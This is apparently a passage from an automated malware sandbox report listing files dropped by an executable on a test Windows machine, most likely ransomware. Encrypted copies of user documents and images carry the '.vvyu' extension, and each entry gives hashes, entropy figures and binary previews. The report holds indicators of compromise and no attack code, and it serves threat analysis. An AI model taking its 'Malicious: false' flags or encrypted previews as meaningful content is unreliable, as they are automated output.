Preview:	EEGWX.....Bo.&"F.........;.u...Je>..Cx...@N..0.(Q!...^...}F..5/O.f.F....m...\|.b.F.X.l+_..CI.]x...='.nB.Wj.....j..=AW..;.`.......6}....5.......@z.).>.N........6P(M8`.Q..".[.b...'=..~6G..k.....$&.. ...?\|.f.N].:.egB....>.O..z.!.....1.6.B8rSe5E.....P;P.+.{w."M....JUB..D.isje..1_,......b.'F.m.KFk......{.....4.9..3...A......(S...R..J.}N.....F.):Ub..ta!.....wT.l..G.(.......)r7l.x..E......~..." .d..z...:...A.CG].......4....$....'.O.7.hR.b.f...........u....t.H...E.z2.!`.J...;?Q..]%.)....nuCB(........ij...^a..(.\|.Ds ..]Y@....?.1d....~..^K..$..-....;?<.T8(..3B .a...z.....'..`.5.......]...<.^k.........W....B.....!a.K#h......{..u...[.....UF.=.H.hI..eI.X..~..U\^h.......f.....=.1.....8..:..w.....uC.rC...n5:...a..x..!..1qx...:.......4`..z....k.,?..v:4.E.)/.....x.V...^.L..x.P.rY..N~f.Q%.H.^N../31]T...n..+t.0.nF\|3...Ay-M......fv.t.].E/...l.....N...w.O.#...YGt..R...w.L(._..mSFi......B.8......}i...j=..T.T.[...\|..\..........{.+)T{\..'u-N...4.....E@>...

C:\Users\user\Desktop\EEGWXUHVUG.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849173703615068
Encrypted:	false
SSDEEP:	24:FqdunPWlrZTcIsvOMWdRtGuUnqpQ8uA1elN86cYPMZR/CGKvTJcX6hu4HjmYksbD:F+uPWFZTWOD0Jz8uuGtPeRqXbJcKrjk+
MD5:	CC3D53A04D1192735AEC0CDF6568D158
SHA1:	C95CB576FD4045FFEE39F2AE244587018B7573BD
SHA-256:	2FC6AFAFED5986E948AAB21E4070EF4E0FE41637234AAEDA6832522DB12CD577
SHA-512:	57F7B98CC36BA3C0A3F1B3105E01E796C9BAA44C58D24074BED561E014419F5817C40701568C4836626F10FEABFC7589FEE4E749E194C2F5717BBBEFE51E8675
Malicious:	false
Preview:	EEGWX.....Bo.&"F.........;.u...Je>..Cx...@N..0.(Q!...^...}F..5/O.f.F....m...\|.b.F.X.l+_..CI.]x...='.nB.Wj.....j..=AW..;.`.......6}....5.......@z.).>.N........6P(M8`.Q..".[.b...'=..~6G..k.....$&.. ...?\|.f.N].:.egB....>.O..z.!.....1.6.B8rSe5E.....P;P.+.{w."M....JUB..D.isje..1_,......b.'F.m.KFk......{.....4.9..3...A......(S...R..J.}N.....F.):Ub..ta!.....wT.l..G.(.......)r7l.x..E......~..." .d..z...:...A.CG].......4....$....'.O.7.hR.b.f...........u....t.H...E.z2.!`.J...;?Q..]%.)....nuCB(........ij...^a..(.\|.Ds ..]Y@....?.1d....~..^K..$..-....;?<.T8(..3B .a...z.....'..`.5.......]...<.^k.........W....B.....!a.K#h......{..u...[.....UF.=.H.hI..eI.X..~..U\^h.......f.....=.1.....8..:..w.....uC.rC...n5:...a..x..!..1qx...:.......4`..z....k.,?..v:4.E.)/.....x.V...^.L..x.P.rY..N~f.Q%.H.^N../31]T...n..+t.0.nF\|3...Ay-M......fv.t.].E/...l.....N...w.O.#...YGt..R...w.L(._..mSFi......B.8......}i...j=..T.T.[...\|..\..........{.+)T{\..'u-N...4.....E@>...

C:\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.825853439253717
Encrypted:	false
SSDEEP:	24:aj6cJ0nxaA9N7c+Yz1IpxYNLKGKeqRsONL0hlxT1VMzWjZtGL8lIPaRsbD:aOmA9NM6YBIRsONo5HMz6tGLIICRmD
MD5:	05EEE8C06E4DCA992E24CA4F132A2221
SHA1:	3B2D8097A2DE82B3424493AD54A06252365C02AD
SHA-256:	C7E22F20F22722345B6E0C88C9FC22A56A1586E2B855028B3120CAAD870EE2D7
SHA-512:	D9854C8AA774408B5A2A8869EAC00D9E62BD1DF878B3ED891000377864C2C674A5CC277AF690E3357131A7E44EF81B4CE1DB4A68CE1F9CDA07E8E59A8267B899
Malicious:	false
Preview:	BJZFP?O.I$.4...r<[.V...Lr6>....V .n.5.;..5Gd.sX..c.?.eaq...`..M,L.T..!.....K..P.FT[l....m.........4....._.\9o.].C.4F...]..d!.......;.%.!0...}LB.Y.9p.wD....v@..i.{..5..\|.\j....>_.8.......\..T(.3\..Z"....6.i.3!.[^....S....Ct{......X.A.k%._..T..L.t....Sf...t.:8...y.o.>..D.\|..lk.M..i.!.L.....0...)....I.!.u?,...jIk,....n...e.........U..B...k.[!.,..^.\.Ku:\|!vApv.a[.....Y...+.....,.fosID2.lwE.....&..{...l...9>....bV~....b....N.o............`.i.f...o.X.).+..il_..I%'J.. $.;...H.I1..-..)\.).Y.T..,..C.+..e....g..k(.n...!....@a.E..'V...-7.$\|..F.>...5..>`..3...r./.h.....d..@m$;imn..._\P.aP...XR.6SP.K,..oUR......d......v..WD.a.D...i]{.7.hK..^......#....3^..0..q$G...(`......T.CT..............n.H..0k./.'....I.:T,$%..Y.........Xn~.p..#y......{@..n..Z.......#i....+....m.._g...=+..'.B.d....aC.m."Z.q.v?>.........F.a.p.......4.HhA..0.z%}.o.3...F.B.s@.XCJt..C.%CN..;.^(TJ..WDEL.i..H..@\.....q.Q.......rX......(,....>...l.d/..a#..E....;....BE..G.!...J+..H.c.w.q.....*n<...

C:\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.825853439253717
Encrypted:	false
SSDEEP:	24:aj6cJ0nxaA9N7c+Yz1IpxYNLKGKeqRsONL0hlxT1VMzWjZtGL8lIPaRsbD:aOmA9NM6YBIRsONo5HMz6tGLIICRmD
MD5:	05EEE8C06E4DCA992E24CA4F132A2221
SHA1:	3B2D8097A2DE82B3424493AD54A06252365C02AD
SHA-256:	C7E22F20F22722345B6E0C88C9FC22A56A1586E2B855028B3120CAAD870EE2D7
SHA-512:	D9854C8AA774408B5A2A8869EAC00D9E62BD1DF878B3ED891000377864C2C674A5CC277AF690E3357131A7E44EF81B4CE1DB4A68CE1F9CDA07E8E59A8267B899
Malicious:	false
Preview:	BJZFP?O.I$.4...r<[.V...Lr6>....V .n.5.;..5Gd.sX..c.?.eaq...`..M,L.T..!.....K..P.FT[l....m.........4....._.\9o.].C.4F...]..d!.......;.%.!0...}LB.Y.9p.wD....v@..i.{..5..\|.\j....>_.8.......\..T(.3\..Z"....6.i.3!.[^....S....Ct{......X.A.k%._..T..L.t....Sf...t.:8...y.o.>..D.\|..lk.M..i.!.L.....0...)....I.!.u?,...jIk,....n...e.........U..B...k.[!.,..^.\.Ku:\|!vApv.a[.....Y...+.....,.fosID2.lwE.....&..{...l...9>....bV~....b....N.o............`.i.f...o.X.).+..il_..I%'J.. $.;...H.I1..-..)\.).Y.T..,..C.+..e....g..k(.n...!....@a.E..'V...-7.$\|..F.>...5..>`..3...r./.h.....d..@m$;imn..._\P.aP...XR.6SP.K,..oUR......d......v..WD.a.D...i]{.7.hK..^......#....3^..0..q$G...(`......T.CT..............n.H..0k./.'....I.:T,$%..Y.........Xn~.p..#y......{@..n..Z.......#i....+....m.._g...=+..'.B.d....aC.m."Z.q.v?>.........F.a.p.......4.HhA..0.z%}.o.3...F.B.s@.XCJt..C.%CN..;.^(TJ..WDEL.i..H..@\.....q.Q.......rX......(,....>...l.d/..a#..E....;....BE..G.!...J+..H.c.w.q.....*n<...

C:\Users\user\Desktop\EEGWXUHVUG\DUUDTUBZFW.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834521659743148
Encrypted:	false
SSDEEP:	24:Kb77FoZccHqctQ2wPClBCoNOmIIg/sKVAMCx0o1AmLitbiB/N5zg8sbD:KbFGccHqMw6lAoNNI9AgCLLsb8/PmD
MD5:	A69402FE56D3033D2D30FAD359DB1C6F
SHA1:	0C8CE4C85415FB0D7CB61E590F0CB414FA426AC6
SHA-256:	0F0C2F688504E50452BDC3D52242FCE9208D903DD35F84F576E5A65E99732F1B
SHA-512:	D62EE2DDF1A00C1752EDF82ADC4EBB6B7D7ED0035E99030FDF62ED5D31FFDCAF419A22684EECD0244E369764A319BFAB3D61041D17BA64FB0DA634ABA814DAE0
Malicious:	false
Preview:	DUUDTQ....B..a...-0;.;..u.~%.M...=...'_..ip...n<2.vW...r..i.......L......\|....E..O2cm....G.z...w.(g.+....P....n....;8#.v..@...D9.#.;o.=.m.p.....lv...s..>$U.P.......bhD.(a..\..r.r... .D.A....-.'...`-.41).O;.......}.....g..9.'.\.G..?...\|.b~TI..w....N..>...Q.=x.[T.]...#.S.Q....;.d}.-.xK#..U........j.d..f.i.B..%...A0....$.M.4.....@.~.~...T.7.}".q....e!F.'`OEs5...V..\|....9Q..2m........6...q.D.F....~.@.b.X...X..8.f{..0.W/g].T...0.....bP..........d.g../g..Tg.;..X..V?..\|.;b...h8.b.......5...R...u(j... ......i....W.....ON....O..WA.Z..:...(..M.RB$.!.s..#..Y.e...z........X.W...H,i;..\X.).e.......h[ ...c.R9f.:.Ug^.uc..{j....~...>yH.C.7r.$.>H<z....,.-....q..............H....-}...L3.hy.......;..x....H.,..d.AA...+...h.\._.\.<o....`..Y....[8...$..I6.vX..1...[....a.!...>k.~&H.Bwm...$...l.yn.cP2.qR.......g.......4.=/U.G,..G.ZI.YRY..>\.=.,..j.....S.4.O..d....\.:....!..\..t:2w.mk6...?F..@.).<.F....U.-H..U?.......u.H;j....xx.....`Q.j..~.y..e^..bW.:!q.........8.x.v...

C:\Users\user\Desktop\EEGWXUHVUG\DUUDTUBZFW.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834521659743148
Encrypted:	false
SSDEEP:	24:Kb77FoZccHqctQ2wPClBCoNOmIIg/sKVAMCx0o1AmLitbiB/N5zg8sbD:KbFGccHqMw6lAoNNI9AgCLLsb8/PmD
MD5:	A69402FE56D3033D2D30FAD359DB1C6F
SHA1:	0C8CE4C85415FB0D7CB61E590F0CB414FA426AC6
SHA-256:	0F0C2F688504E50452BDC3D52242FCE9208D903DD35F84F576E5A65E99732F1B
SHA-512:	D62EE2DDF1A00C1752EDF82ADC4EBB6B7D7ED0035E99030FDF62ED5D31FFDCAF419A22684EECD0244E369764A319BFAB3D61041D17BA64FB0DA634ABA814DAE0
Malicious:	false
Preview:	DUUDTQ....B..a...-0;.;..u.~%.M...=...'_..ip...n<2.vW...r..i.......L......\|....E..O2cm....G.z...w.(g.+....P....n....;8#.v..@...D9.#.;o.=.m.p.....lv...s..>$U.P.......bhD.(a..\..r.r... .D.A....-.'...`-.41).O;.......}.....g..9.'.\.G..?...\|.b~TI..w....N..>...Q.=x.[T.]...#.S.Q....;.d}.-.xK#..U........j.d..f.i.B..%...A0....$.M.4.....@.~.~...T.7.}".q....e!F.'`OEs5...V..\|....9Q..2m........6...q.D.F....~.@.b.X...X..8.f{..0.W/g].T...0.....bP..........d.g../g..Tg.;..X..V?..\|.;b...h8.b.......5...R...u(j... ......i....W.....ON....O..WA.Z..:...(..M.RB$.!.s..#..Y.e...z........X.W...H,i;..\X.).e.......h[ ...c.R9f.:.Ug^.uc..{j....~...>yH.C.7r.$.>H<z....,.-....q..............H....-}...L3.hy.......;..x....H.,..d.AA...+...h.\._.\.<o....`..Y....[8...$..I6.vX..1...[....a.!...>k.~&H.Bwm...$...l.yn.cP2.qR.......g.......4.=/U.G,..G.ZI.YRY..>\.=.,..j.....S.4.O..d....\.:....!..\..t:2w.mk6...?F..@.).<.F....U.-H..U?.......u.H;j....xx.....`Q.j..~.y..e^..bW.:!q.........8.x.v...

C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8566924447942394
Encrypted:	false
SSDEEP:	24:bCuwTPHNEK2KuL41hn4zMYoWMZ7A/s+EPqGOr8QY04TuNsbD:GuwTFSKe41qzLoZZ0EHqGOr8lJmmD
MD5:	72C238A1BEDB44CE9B4B7F85926E436D
SHA1:	861D19EEE9FF52C7BABFCA1F9BF7C2E226C6878B
SHA-256:	294452E319ED749C25B469955E5CFA19F9B1916F115B19235D63F5B533E6EF51
SHA-512:	6305116A9D570DD43497013848F212A715D3AE0C785A2F7FE6C9BF9A745D3A0D68B13A089554F2A2658D97681C9B50BE71529CF383B950A172C743E239D4E430
Malicious:	false
Preview:	EEGWX.u.)....hR.5W@....EMF...f\y..E.o...0x]]\...._+..B.........Hv..(...'...6..........!,?.%..$.?..a..>..b..A.......6G..'.;4.."O...._=q.....~.2.Z..K5....t..II.....T.....36.....D......O...........q&..C......?.[tZH..M.&0{5..".......HgAG..@'.`r...0..^.m2.<...k2#`<q.AXT<^9...wN2\m+.`b>...W+...z...j.C...E.........}.LV..>.._..G7...4.P!.-...,..........F.C.\.@....`e.....oVk.'..Kc..;YE.Y.H.....x.!f...'...B.).D...>.6q.-..&D.."......P....6AVN.._.cT...-.{.$.f.X.....d.........I...Z.k...:8.....L6z..<.s..uWK/.&....\|..z.1.A...?..o.1.1x...>....W.@..=..}.... .(d.,..........}j`..."!....\C"...4? Kx.S......*.y]k.87.w-.1..?...^..i.........CQ.....]:.S.%.&K.............;,]..=.y...Q..&....s....u.0]X_q]....."i....&"O....q.x......P..d.X.....4.......[.y\|;..8.....h..v.Jy^..[P.^ES.......6.....}S..2@........./..z..#d.P.H2v....C,.R.....K.....p....[.S..._.+i. ......]Ggmw.h#..W..j..F.b.].l..5.Nf.~..E...{K.?).J..K.8QJS..`.3Q.1.fP.p'.t..v.d7.kB...@.{....w.+.r.....W...\

C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8566924447942394
Encrypted:	false
SSDEEP:	24:bCuwTPHNEK2KuL41hn4zMYoWMZ7A/s+EPqGOr8QY04TuNsbD:GuwTFSKe41qzLoZZ0EHqGOr8lJmmD
MD5:	72C238A1BEDB44CE9B4B7F85926E436D
SHA1:	861D19EEE9FF52C7BABFCA1F9BF7C2E226C6878B
SHA-256:	294452E319ED749C25B469955E5CFA19F9B1916F115B19235D63F5B533E6EF51
SHA-512:	6305116A9D570DD43497013848F212A715D3AE0C785A2F7FE6C9BF9A745D3A0D68B13A089554F2A2658D97681C9B50BE71529CF383B950A172C743E239D4E430
Malicious:	false
Preview:	EEGWX.u.)....hR.5W@....EMF...f\y..E.o...0x]]\...._+..B.........Hv..(...'...6..........!,?.%..$.?..a..>..b..A.......6G..'.;4.."O...._=q.....~.2.Z..K5....t..II.....T.....36.....D......O...........q&..C......?.[tZH..M.&0{5..".......HgAG..@'.`r...0..^.m2.<...k2#`<q.AXT<^9...wN2\m+.`b>...W+...z...j.C...E.........}.LV..>.._..G7...4.P!.-...,..........F.C.\.@....`e.....oVk.'..Kc..;YE.Y.H.....x.!f...'...B.).D...>.6q.-..&D.."......P....6AVN.._.cT...-.{.$.f.X.....d.........I...Z.k...:8.....L6z..<.s..uWK/.&....\|..z.1.A...?..o.1.1x...>....W.@..=..}.... .(d.,..........}j`..."!....\C"...4? Kx.S......*.y]k.87.w-.1..?...^..i.........CQ.....]:.S.%.&K.............;,]..=.y...Q..&....s....u.0]X_q]....."i....&"O....q.x......P..d.X.....4.......[.y\|;..8.....h..v.Jy^..[P.^ES.......6.....}S..2@........./..z..#d.P.H2v....C,.R.....K.....p....[.S..._.+i. ......]Ggmw.h#..W..j..F.b.].l..5.Nf.~..E...{K.?).J..K.8QJS..`.3Q.1.fP.p'.t..v.d7.kB...@.{....w.+.r.....W...\

C:\Users\user\Desktop\EEGWXUHVUG\EFOYFBOLXA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851653926286405
Encrypted:	false
SSDEEP:	24:8Mc3gYAafYbMiroMzndnxYK8NSmDX+98IwkLa5aDWdOm/8sbD:8l5h+/7d8NJYwkL2WWamD
MD5:	C149BB319651BC312AD965C7CAE757EF
SHA1:	E3B27D301557AA07B3B6F8A1AB85C3111BD6F1A5
SHA-256:	C3CEEB7F2507FF14FBCCB60ECA7426B9101746C4388026B2D1BCBC07714FD8F6
SHA-512:	9BDC5214B41B87C768CB2E1FF2459ED4D8501D3F6589B80C1895A41F9C2DF402D9F6DA16A0E8E3AC68CC4A835826DCAAC731C67B0EFE7F363FBA6E837AAD9B5D
Malicious:	false
Preview:	EFOYF.K..Po.U..T...W....Xe.e...1.%..\...#..2...#......U.9)..e\MM4w..Aj.XM.Y[Us5.%...I.y...A....].........I..i.w../...Z....k.w.p......W<.t..V..IJ..S5..!.r.`. ..!..n.W.D..oC..r.u..(..X.4z.BR#..+GN.vn.s.wn..8&%o.2.m!.nz?`...>...FB.h..G;..<...,Z..U.W..u..N`$..;.A=..Y..MM.......3x...2Nz.9.....0..e.A=&.:....D7j...L-.....g.x...c.}'.4.t......Ud..1......A7.Q..E.U....;T!.P..1Wn....\..F..G8....>.y.~..VoS...=..[#..S....@..6...bS xH..!:..l..C..!..9X.S......[.*...Tw..T..dq.w..a3c.T.....y._..;cSW..2..vEQ.{_:.%,..@...D.._.Wc.psDN4\........RS......aH.C.S.......B.'....Qf.~c.....n.a.V6.....x.dHKf.3.6.Q.KG..vf..\..a..e.[.^.3...]... '......?.=p....w..y............;N.<.<....M.4.#.}.j..N5W....U...I{..:..[tR......4.........`.4KS....f.#L...).6.}I./.y._x...."...D..-.0K.[K&...../..)..dk.Z....x.......>...e......tO&.D..y...q5...l...>i]S.....{.T.~r.b.=.....Q..N../j...X.o.z5=......a...e....6PA.Xk....r^...f..`.....HM...&... ...K.4a."U.g..t..S.~Ql..g.;..-..)

C:\Users\user\Desktop\EEGWXUHVUG\EFOYFBOLXA.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851653926286405
Encrypted:	false
SSDEEP:	24:8Mc3gYAafYbMiroMzndnxYK8NSmDX+98IwkLa5aDWdOm/8sbD:8l5h+/7d8NJYwkL2WWamD
MD5:	C149BB319651BC312AD965C7CAE757EF
SHA1:	E3B27D301557AA07B3B6F8A1AB85C3111BD6F1A5
SHA-256:	C3CEEB7F2507FF14FBCCB60ECA7426B9101746C4388026B2D1BCBC07714FD8F6
SHA-512:	9BDC5214B41B87C768CB2E1FF2459ED4D8501D3F6589B80C1895A41F9C2DF402D9F6DA16A0E8E3AC68CC4A835826DCAAC731C67B0EFE7F363FBA6E837AAD9B5D
Malicious:	false
Preview:	EFOYF.K..Po.U..T...W....Xe.e...1.%..\...#..2...#......U.9)..e\MM4w..Aj.XM.Y[Us5.%...I.y...A....].........I..i.w../...Z....k.w.p......W<.t..V..IJ..S5..!.r.`. ..!..n.W.D..oC..r.u..(..X.4z.BR#..+GN.vn.s.wn..8&%o.2.m!.nz?`...>...FB.h..G;..<...,Z..U.W..u..N`$..;.A=..Y..MM.......3x...2Nz.9.....0..e.A=&.:....D7j...L-.....g.x...c.}'.4.t......Ud..1......A7.Q..E.U....;T!.P..1Wn....\..F..G8....>.y.~..VoS...=..[#..S....@..6...bS xH..!:..l..C..!..9X.S......[.*...Tw..T..dq.w..a3c.T.....y._..;cSW..2..vEQ.{_:.%,..@...D.._.Wc.psDN4\........RS......aH.C.S.......B.'....Qf.~c.....n.a.V6.....x.dHKf.3.6.Q.KG..vf..\..a..e.[.^.3...]... '......?.=p....w..y............;N.<.<....M.4.#.}.j..N5W....U...I{..:..[tR......4.........`.4KS....f.#L...).6.}I./.y._x...."...D..-.0K.[K&...../..)..dk.Z....x.......>...e......tO&.D..y...q5...l...>i]S.....{.T.~r.b.=.....Q..N../j...X.o.z5=......a...e....6PA.Xk....r^...f..`.....HM...&... ...K.4a."U.g..t..S.~Ql..g.;..-..)

C:\Users\user\Desktop\EEGWXUHVUG\EWZCVGNOWT.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849756026918252
Encrypted:	false
SSDEEP:	24:CYE9E3+QnhHm5WgfKibRlyoxXPnsEUYnlKp/vN6mnapzthidsbD:Cl9w+C4WgSidwaXvgck9N7YBYdmD
MD5:	333650E8EB95BC36FF73783CB8911328
SHA1:	3A8A0F14B308552D765BE24724DA7CD8A526DF89
SHA-256:	05488B330E7150B8CB9D7372038FC1A437C04D85DA301CFD1081341C248D12B8
SHA-512:	785BB2CBF0CFD6B0EE9B9C89BCA42D50BEE9479C169012439BFBA4CA816E90A5070F16D5DCEC17EE3B971AC11E9DD3A080021F5EBFB412CA72A700E1DFCF2488
Malicious:	false
Preview:	EWZCVn.....B..0...C...5.b........,.p...UrM..!=...@.kW.Y../..H..j.q.O...J..r.4..07.IN...}..Si...vt.....1fBz.a....B.ye...k ...z.;O.I.v.?.`.aUxs..0........U...e..*/.....A...mh..#.3NUi.T..\|.y.^A. ..F...K......4&....>Z...f.-..h.F.C.P..v.n5...6...{yr rL...e:.....R........V....-s..C#....".......U.e.....p0dQ....!.,..L?-.7.. .q.M1.79...l/9}.w.sw.&....~..vp..Y9.E.$.^$.~.Cl...g. .D...1l.j ....(.f..OWZ......r\a....y..p.\|A....sH.`.."...7..#..X..g%..w.,./J...un...7.4..j.....R....h.~........\.PW....?..=:..Y.$%.<.%X...M..t...2.}P....L[...b..`.#............N.R.N....^.....J.?..~..!i.....9>Q.C.P..d.O.F......h.;..O....2...}.......T....r,......2.....\=......+;pWu.(B.um.$....B..T.x...........5..m..C<..2...k....v..R.{..B.p..'.B(..q}....F.5`.I.....U.D.c8....t.<!.`.Q..W{OOv7.{.2...._0....S...9~.9..QM.r..h9.b....A.E.O.....0N0..h..w...N..V4t..b]..t..l..Q9.8?...d}.d.....rR.?.Z,..q..X.\|...a.c....P.u...}..w....&.0.......{3&<..;3$.)/...m&....s0...w..

C:\Users\user\Desktop\EEGWXUHVUG\EWZCVGNOWT.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849756026918252
Encrypted:	false
SSDEEP:	24:CYE9E3+QnhHm5WgfKibRlyoxXPnsEUYnlKp/vN6mnapzthidsbD:Cl9w+C4WgSidwaXvgck9N7YBYdmD
MD5:	333650E8EB95BC36FF73783CB8911328
SHA1:	3A8A0F14B308552D765BE24724DA7CD8A526DF89
SHA-256:	05488B330E7150B8CB9D7372038FC1A437C04D85DA301CFD1081341C248D12B8
SHA-512:	785BB2CBF0CFD6B0EE9B9C89BCA42D50BEE9479C169012439BFBA4CA816E90A5070F16D5DCEC17EE3B971AC11E9DD3A080021F5EBFB412CA72A700E1DFCF2488
Malicious:	false
Preview:	EWZCVn.....B..0...C...5.b........,.p...UrM..!=...@.kW.Y../..H..j.q.O...J..r.4..07.IN...}..Si...vt.....1fBz.a....B.ye...k ...z.;O.I.v.?.`.aUxs..0........U...e..*/.....A...mh..#.3NUi.T..\|.y.^A. ..F...K......4&....>Z...f.-..h.F.C.P..v.n5...6...{yr rL...e:.....R........V....-s..C#....".......U.e.....p0dQ....!.,..L?-.7.. .q.M1.79...l/9}.w.sw.&....~..vp..Y9.E.$.^$.~.Cl...g. .D...1l.j ....(.f..OWZ......r\a....y..p.\|A....sH.`.."...7..#..X..g%..w.,./J...un...7.4..j.....R....h.~........\.PW....?..=:..Y.$%.<.%X...M..t...2.}P....L[...b..`.#............N.R.N....^.....J.?..~..!i.....9>Q.C.P..d.O.F......h.;..O....2...}.......T....r,......2.....\=......+;pWu.(B.um.$....B..T.x...........5..m..C<..2...k....v..R.{..B.p..'.B(..q}....F.5`.I.....U.D.c8....t.<!.`.Q..W{OOv7.{.2...._0....S...9~.9..QM.r..h9.b....A.E.O.....0N0..h..w...N..V4t..b]..t..l..Q9.8?...d}.d.....rR.?.Z,..q..X.\|...a.c....P.u...}..w....&.0.......{3&<..;3$.)/...m&....s0...w..

C:\Users\user\Desktop\EEGWXUHVUG\ZGGKNSUKOP.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852098391250622
Encrypted:	false
SSDEEP:	24:qXPIvqDgUpSBLFQANnDu9t1Hgrv0gGj4g7hL3gX/jlwCxdsbD:dqD7pSBNnDu90rv0/hNgvj/dmD
MD5:	C817B4A11FB1F64D33DCD23E54320207
SHA1:	2D06CAB9258E0624E3C474ACAACA0BEAF7C8B455
SHA-256:	F210B0715395D2DF0F00F40814BF71039946A5BDFB559CFAF8814C527F380BFF
SHA-512:	2881427E14ACC66037CFA4A9994F63FE733A04EE9A8FABB319D598A23D50F5BBF8DD76816D21F2FA5A22BDEB02F053B51E4104D7E315A9B38383ABB292EBEA3E
Malicious:	false
Preview:	ZGGKNi.....%..W...~.<..+.Y?...V.....?..R....d.v.p(hK.Jj.m.L..7l0.....F....P.\..H[v....H.....T.7W...7.P.%x..&..?.7.Z......Yp......xZ..X..K26.+.t%U>.}$..Q<........B..:+.......C..h.e.f.CR.,..D...u.EJLN.qo....>..m.0...vR.....e.)....(..P.E[..-D.k.'U.-y....'..o~-.#.).d..6.....6....K.$..!....z...7\.X;.{Lr./..G..?.,.....2.88..p51l...nV.1...V..u........b8.......$.sJ1....m.1vkWr..g..../....).'...JF....7.N..Q5"<#l0;..f.....KL...);q8..U......L<^....jSQf..^...7..;......[....3+..T.2.8.....7.2c.... .........s.....^...`Q..L.l..U..e..7.C_.R...]...vS .....Fm.u.~R.:......UA.......U.M.:....pBE...x..Wp..m....\|d..XBhF...$.N~..I..k...t;....H.`J.......S.a..p.....#.SC..q..y.m..;.\|p..T... .......R..VbHiB..._L.... .o.....RW.......,...9m~.H..W.0..(r.7..7.......G...d~R.Q=..dM.D......d.....:..:...W...{}..h>*.....x}"....<.b..xd..}..8......67(....!..^s...'YF^...5.#Q.hF.X.5.r.z+b..L.hN.:3.^T.......f..pN..p. ...G>.6(."F...>....7R.....+WV).........}!..%7....2..<.BC.

C:\Users\user\Desktop\EEGWXUHVUG\ZGGKNSUKOP.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852098391250622
Encrypted:	false
SSDEEP:	24:qXPIvqDgUpSBLFQANnDu9t1Hgrv0gGj4g7hL3gX/jlwCxdsbD:dqD7pSBNnDu90rv0/hNgvj/dmD
MD5:	C817B4A11FB1F64D33DCD23E54320207
SHA1:	2D06CAB9258E0624E3C474ACAACA0BEAF7C8B455
SHA-256:	F210B0715395D2DF0F00F40814BF71039946A5BDFB559CFAF8814C527F380BFF
SHA-512:	2881427E14ACC66037CFA4A9994F63FE733A04EE9A8FABB319D598A23D50F5BBF8DD76816D21F2FA5A22BDEB02F053B51E4104D7E315A9B38383ABB292EBEA3E
Malicious:	false
Preview:	ZGGKNi.....%..W...~.<..+.Y?...V.....?..R....d.v.p(hK.Jj.m.L..7l0.....F....P.\..H[v....H.....T.7W...7.P.%x..&..?.7.Z......Yp......xZ..X..K26.+.t%U>.}$..Q<........B..:+.......C..h.e.f.CR.,..D...u.EJLN.qo....>..m.0...vR.....e.)....(..P.E[..-D.k.'U.-y....'..o~-.#.).d..6.....6....K.$..!....z...7\.X;.{Lr./..G..?.,.....2.88..p51l...nV.1...V..u........b8.......$.sJ1....m.1vkWr..g..../....).'...JF....7.N..Q5"<#l0;..f.....KL...);q8..U......L<^....jSQf..^...7..;......[....3+..T.2.8.....7.2c.... .........s.....^...`Q..L.l..U..e..7.C_.R...]...vS .....Fm.u.~R.:......UA.......U.M.:....pBE...x..Wp..m....\|d..XBhF...$.N~..I..k...t;....H.`J.......S.a..p.....#.SC..q..y.m..;.\|p..T... .......R..VbHiB..._L.... .o.....RW.......,...9m~.H..W.0..(r.7..7.......G...d~R.Q=..dM.D......d.....:..:...W...{}..h>*.....x}"....<.b..xd..}..8......67(....!..^s...'YF^...5.#Q.hF.X.5.r.z+b..L.hN.:3.^T.......f..pN..p. ...G>.6(."F...>....7R.....+WV).........}!..%7....2..<.BC.

